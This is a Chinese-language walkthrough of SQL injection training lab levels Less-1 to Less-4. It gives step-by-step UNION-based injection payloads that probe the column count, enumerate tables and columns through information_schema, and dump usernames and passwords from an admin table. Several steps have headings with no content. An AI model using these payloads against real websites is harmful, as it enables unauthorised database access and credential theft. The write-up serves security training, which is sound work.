Less-1

1. 测试是字符型还是数字型

2. 判断所在字段数

   

3. 查看显示值

   

   可以看出显示2,3位置。因此我们选择2的位置进行联合注入

4. 查看表名

   

   • 我们要对admin，users等字符敏感

5. 查看admin表中的字段名

   

6. 显示内容

   

   获得flag：helloword

7. less-1的代码

   

Less-2

1. 判断字符型注入还是数字型注入

   

   通过匹配单引号我们可以看出我们所写的单引号并没有被匹配因此我们可以看出这是一个数字注入

2. 判断所在表的字段数

   -1+order+by+4
   

   

3. 查看显示位置

   -1+union+select+1,2,3
   

   

4. 查看表名

   -1+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+ 
   

   

5. 查看admin表名的字段

   -1+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   

   

6. 查看内容

   -1+union+select+1,(select+concat(username,0x5c,password)+from+admin+limit+0,1),3--+
   

   

7. 代码查看

   

Less-3

1. 查看

   -1'
   

   

   由错误回显可以看出该类型为字符型注入，且需要闭合引号

   -1')--+
   

   
   发现构造成功

2. 判断字段数

   -1')+order+by+4--+
   

   

3. 查看显示位置

   -1')+union+select+1,2,3--+
   

   

4. 查看表名

   -1')+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
   

   

5. 查看字段

   -1')+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   

   

6. 查看内容

   

7. 代码审计

   

Less-4

1. 构造

   -1'
   

   

   无反应

   -1"
   

   

   发现我们需要闭合双引号和括号

   -1") order by 100--+
   

   

   发现构造成功

2. 判断该表的字段数

   -1")order+by+4--+
   

   

3. 判断显示位置

   -1")union+select+1,2,3--+
   

   

4. 查询表名

   -1")union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
   

   

5. 查看admin表中的字段名

   -1")union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   

   

6. 获取admin表中内容

   -1")union+select+1,(select+concat(username,0x5c,password)+from+admin),3--+
   

   

7. 代码审计